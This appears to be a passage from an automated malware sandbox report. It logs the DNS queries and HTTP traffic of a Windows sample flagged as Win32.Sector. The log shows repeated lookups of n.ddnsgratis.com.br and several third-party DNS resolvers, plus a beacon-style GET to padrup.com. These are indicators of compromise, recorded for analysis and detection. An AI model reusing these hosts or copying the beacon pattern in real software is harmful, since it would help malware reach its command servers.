                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.459676981 CEST192.168.2.91.1.1.10x12fbStandard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.472408056 CEST192.168.2.995.85.9.860xa2eaStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:35.591125011 CEST192.168.2.995.85.9.860xa2eaStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:36.629070997 CEST192.168.2.995.85.9.860xa2eaStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:38.738105059 CEST192.168.2.995.85.9.860xa2eaStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:42.770468950 CEST192.168.2.995.85.9.860xa2eaStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.838177919 CEST192.168.2.98.8.8.80x1caaStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.617563009 CEST192.168.2.91.1.1.10x7485Standard query (0)ns.dotbit.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.629956961 CEST192.168.2.91.1.1.10xa76Standard query (0)alors.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.661932945 CEST192.168.2.91.1.1.10x1394Standard query (0)onyx.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.704653978 CEST192.168.2.91.1.1.10xc99eStandard query (0)ns1.any.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.716046095 CEST192.168.2.91.1.1.10xe238Standard query (0)ns1.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.746553898 CEST192.168.2.9178.17.170.1330x6dc2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.815402031 CEST192.168.2.9178.17.170.1330x6dc2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.862550020 CEST192.168.2.9178.17.170.1330x6dc2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.910829067 CEST192.168.2.9178.17.170.1330x6dc2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.957437038 CEST192.168.2.9178.17.170.1330x6dc2Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.004734039 CEST192.168.2.91.1.1.10x642Standard query (0)ns2.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.018744946 CEST192.168.2.9185.14.29.1400xdc19Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.044097900 CEST192.168.2.9185.14.29.1400xdc19Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.081768990 CEST192.168.2.9185.14.29.1400xdc19Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.161009073 CEST192.168.2.9185.14.29.1400xdc19Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.207907915 CEST192.168.2.9185.14.29.1400xdc19Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.248543024 CEST192.168.2.91.1.1.10x4d4Standard query (0)anyone.dnsrec.meo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.263775110 CEST192.168.2.91.1.1.10x1414Standard query (0)ist.fellig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.347028971 CEST192.168.2.91.1.1.10x1414Standard query (0)ist.fellig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.415359020 CEST192.168.2.9178.63.145.2360x458eStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:55.430516958 CEST192.168.2.9178.63.145.2360x458eStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:56.440752983 CEST192.168.2.9178.63.145.2360x458eStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.444480896 CEST192.168.2.9178.63.145.2360x458eStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:02.474888086 CEST192.168.2.9178.63.145.2360x458eStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.504868984 CEST192.168.2.91.1.1.10xe83cStandard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.596029043 CEST192.168.2.91.1.1.10xe83cStandard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.604376078 CEST192.168.2.91.1.1.10x5bcStandard query (0)ns2.fr.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.614948988 CEST192.168.2.937.187.0.400x45c3Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:07.635962963 CEST192.168.2.937.187.0.400x45c3Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:08.643780947 CEST192.168.2.937.187.0.400x45c3Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.658979893 CEST192.168.2.937.187.0.400x45c3Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:14.840624094 CEST192.168.2.937.187.0.400x45c3Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:18.911434889 CEST192.168.2.91.1.1.10x40d8Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:18.941973925 CEST192.168.2.9128.199.248.1050xc63bStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.252859116 CEST192.168.2.9128.199.248.1050xc63bStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.550877094 CEST192.168.2.9128.199.248.1050xc63bStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.875459909 CEST192.168.2.9128.199.248.1050xc63bStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.206214905 CEST192.168.2.9128.199.248.1050xc63bStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.525527954 CEST192.168.2.91.1.1.10x3599Standard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.611905098 CEST192.168.2.91.1.1.10x3599Standard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.621762037 CEST192.168.2.995.85.9.860x4890Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:21.644077063 CEST192.168.2.995.85.9.860x4890Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.660218000 CEST192.168.2.995.85.9.860x4890Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:24.776211023 CEST192.168.2.995.85.9.860x4890Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.944122076 CEST192.168.2.995.85.9.860x4890Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:32.989737034 CEST192.168.2.98.8.8.80xc139Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.781296015 CEST1.1.1.1192.168.2.90x818bNo error (0)padrup.com185.53.178.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.803855896 CEST1.1.1.1192.168.2.90x73baName error (3)ns.dotbit.menonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.858596087 CEST1.1.1.1192.168.2.90x2a3aName error (3)alors.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.925499916 CEST1.1.1.1192.168.2.90xc2e2Name error (3)onyx.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.973551989 CEST1.1.1.1192.168.2.90x84d4Name error (3)ns1.any.dns.d0wn.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.990966082 CEST1.1.1.1192.168.2.90x9e14No error (0)ns1.random.dns.d0wn.biz178.17.170.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.402256966 CEST1.1.1.1192.168.2.90xab34No error (0)ns2.random.dns.d0wn.biz185.14.29.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.873182058 CEST1.1.1.1192.168.2.90xfc84Name error (3)anyone.dnsrec.meo.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.954793930 CEST1.1.1.1192.168.2.90x3338No error (0)ist.fellig.org178.63.145.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.288327932 CEST1.1.1.1192.168.2.90x6466Name error (3)civet.ziphaze.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:59.305176020 CEST1.1.1.1192.168.2.90xbb93No error (0)ns2.fr.dns.d0wn.biz37.187.0.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.427833080 CEST1.1.1.1192.168.2.90x8c95No error (0)ns1.sg.dns.d0wn.biz128.199.248.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.822495937 CEST1.1.1.1192.168.2.90xa04cNo error (0)ns1.nl.dns.d0wn.biz95.85.9.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.218403101 CEST8.8.8.8192.168.2.90xbad3No error (0)n.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.807610989 CEST1.1.1.1192.168.2.90xf381Name error (3)ns.dotbit.menonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.856287003 CEST1.1.1.1192.168.2.90x23a1Name error (3)alors.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.879431963 CEST1.1.1.1192.168.2.90xd269Name error (3)onyx.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.926701069 CEST1.1.1.1192.168.2.90x6ee1Name error (3)ns1.any.dns.d0wn.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.941551924 CEST1.1.1.1192.168.2.90x59a7No error (0)ns1.random.dns.d0wn.biz178.17.170.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.223747015 CEST1.1.1.1192.168.2.90x7180No error (0)ns2.random.dns.d0wn.biz185.14.29.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.394773960 CEST1.1.1.1192.168.2.90xbc9cName error (3)anyone.dnsrec.meo.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.418649912 CEST1.1.1.1192.168.2.90x26c7No error (0)ist.fellig.org178.63.145.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:46.040185928 CEST1.1.1.1192.168.2.90x9cf6Name error (3)civet.ziphaze.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:46.581429005 CEST1.1.1.1192.168.2.90xeb38No error (0)ns2.fr.dns.d0wn.biz37.187.0.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:58.967267990 CEST1.1.1.1192.168.2.90xd247No error (0)ns1.sg.dns.d0wn.biz128.199.248.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.443355083 CEST1.1.1.1192.168.2.90x78ecNo error (0)ns1.nl.dns.d0wn.biz95.85.9.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.655616045 CEST8.8.8.8192.168.2.90xf4a8No error (0)n.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.040816069 CEST1.1.1.1192.168.2.90x152Name error (3)ns.dotbit.menonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.202539921 CEST1.1.1.1192.168.2.90x8f39Name error (3)alors.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.241705894 CEST1.1.1.1192.168.2.90xb0bbName error (3)onyx.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.253976107 CEST1.1.1.1192.168.2.90xe514Name error (3)ns1.any.dns.d0wn.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.275645971 CEST1.1.1.1192.168.2.90x389cNo error (0)ns1.random.dns.d0wn.biz178.17.170.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.571418047 CEST1.1.1.1192.168.2.90x5628No error (0)ns2.random.dns.d0wn.biz185.14.29.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.696327925 CEST1.1.1.1192.168.2.90x3bafName error (3)anyone.dnsrec.meo.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.726773977 CEST1.1.1.1192.168.2.90x9eacNo error (0)ist.fellig.org178.63.145.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:31.991482973 CEST1.1.1.1192.168.2.90xc993Name error (3)civet.ziphaze.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:32.003139973 CEST1.1.1.1192.168.2.90xbb1fNo error (0)ns2.fr.dns.d0wn.biz37.187.0.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.691513062 CEST1.1.1.1192.168.2.90x4637No error (0)ns1.sg.dns.d0wn.biz128.199.248.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.686969042 CEST1.1.1.1192.168.2.90x6759No error (0)ns1.nl.dns.d0wn.biz95.85.9.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:58.950903893 CEST8.8.8.8192.168.2.90x6c3aNo error (0)n.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.549776077 CEST1.1.1.1192.168.2.90x2a20Name error (3)ns.dotbit.menonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.766468048 CEST1.1.1.1192.168.2.90x7944Name error (3)alors.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:05.957582951 CEST1.1.1.1192.168.2.90xe761Name error (3)onyx.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.135688066 CEST1.1.1.1192.168.2.90x5ea2Name error (3)ns1.any.dns.d0wn.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.321894884 CEST1.1.1.1192.168.2.90x122dNo error (0)ns1.random.dns.d0wn.biz178.17.170.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.903212070 CEST1.1.1.1192.168.2.90x87a5No error (0)ns2.random.dns.d0wn.biz185.14.29.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.084881067 CEST1.1.1.1192.168.2.90xda30Name error (3)anyone.dnsrec.meo.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.121176958 CEST1.1.1.1192.168.2.90x609fNo error (0)ist.fellig.org178.63.145.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.443394899 CEST1.1.1.1192.168.2.90x3b3eName error (3)civet.ziphaze.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.460015059 CEST1.1.1.1192.168.2.90x82bcNo error (0)ns2.fr.dns.d0wn.biz37.187.0.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.831510067 CEST1.1.1.1192.168.2.90xfd75No error (0)ns1.sg.dns.d0wn.biz128.199.248.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.831521034 CEST1.1.1.1192.168.2.90xfd75No error (0)ns1.sg.dns.d0wn.biz128.199.248.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.470710993 CEST1.1.1.1192.168.2.90x12fbNo error (0)ns1.nl.dns.d0wn.biz95.85.9.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.845820904 CEST8.8.8.8192.168.2.90x1caaNo error (0)n.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.628532887 CEST1.1.1.1192.168.2.90x7485Name error (3)ns.dotbit.menonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.653831005 CEST1.1.1.1192.168.2.90xa76Name error (3)alors.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.703104973 CEST1.1.1.1192.168.2.90x1394Name error (3)onyx.deepdns.cryptostorm.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.714534044 CEST1.1.1.1192.168.2.90xc99eName error (3)ns1.any.dns.d0wn.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.727310896 CEST1.1.1.1192.168.2.90xe238No error (0)ns1.random.dns.d0wn.biz178.17.170.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.016729116 CEST1.1.1.1192.168.2.90x642No error (0)ns2.random.dns.d0wn.biz185.14.29.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.261307001 CEST1.1.1.1192.168.2.90x4d4Name error (3)anyone.dnsrec.meo.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.400557041 CEST1.1.1.1192.168.2.90x1414No error (0)ist.fellig.org178.63.145.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.400573969 CEST1.1.1.1192.168.2.90x1414No error (0)ist.fellig.org178.63.145.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.602900982 CEST1.1.1.1192.168.2.90xe83cName error (3)civet.ziphaze.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.606148005 CEST1.1.1.1192.168.2.90xe83cName error (3)civet.ziphaze.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.613405943 CEST1.1.1.1192.168.2.90x5bcNo error (0)ns2.fr.dns.d0wn.biz37.187.0.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:18.940473080 CEST1.1.1.1192.168.2.90x40d8No error (0)ns1.sg.dns.d0wn.biz128.199.248.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.620299101 CEST1.1.1.1192.168.2.90x3599No error (0)ns1.nl.dns.d0wn.biz95.85.9.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.663866043 CEST1.1.1.1192.168.2.90x3599No error (0)ns1.nl.dns.d0wn.biz95.85.9.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.002341986 CEST8.8.8.8192.168.2.90xc139No error (0)n.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                          • padrup.com
                                                                                                                                                                                                                                                                                          • 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          • n.ddnsgratis.com.br

                                                                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          0192.168.2.949707185.53.178.50801376C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.815658092 CEST152OUTGET /sobaka1.gif?72f523=7533859 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964721918 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:41:34 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DaLa3woffRVuyipr4nQUWn4DngEfXMQqc3XCLKLUOwo3I357jjocgZl87QSesErYw/t2hxsI4T7L+9eXKW6euA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 66 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1f0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964740992 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
